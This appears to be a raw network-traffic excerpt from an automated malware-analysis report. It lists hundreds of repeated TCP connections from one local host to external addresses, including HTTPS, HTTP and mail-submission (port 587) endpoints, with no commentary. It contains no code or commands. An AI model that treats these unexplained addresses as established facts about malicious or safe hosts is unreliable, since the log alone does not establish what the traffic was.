                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
